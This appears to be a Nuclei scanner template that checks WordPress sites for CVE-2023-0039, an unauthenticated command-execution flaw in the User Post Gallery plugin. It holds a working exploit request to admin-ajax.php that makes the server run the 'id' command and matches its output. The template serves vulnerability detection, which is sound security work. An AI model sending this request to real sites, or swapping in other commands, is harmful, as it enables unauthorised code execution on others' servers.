id: wordpress-user-post-gallery

info:
  name: WordPress User Post Gallery - Remote Code Execution
  author: "@TheLaluka"
  severity: critical
  description: |
    PoC for CVE-2023-0039 - User Post Gallery - UPG plugin for WordPress. Unfiltered callback php method leading to RCE.
  reference:
    - https://wpscan.com/vulnerability/8f982ebd-6fc5-452d-8280-42e027d01b1e
    - https://github.com/advisories/GHSA-7gm9-w486-54r3
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cwe-id: CWE-77
  metadata:
    max-request: 3
  tags: wp,wpscan,wordpress,wp-plugin,rce,intrusive,exec,upg

http:
  - raw:
      - |
        GET /wp-admin/admin-ajax.php?action=upg_datatable&field=field:exec:id:NULL:NULL HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "uid="
          - "gid="
        condition: and

      - type: status
        status:
          - 200
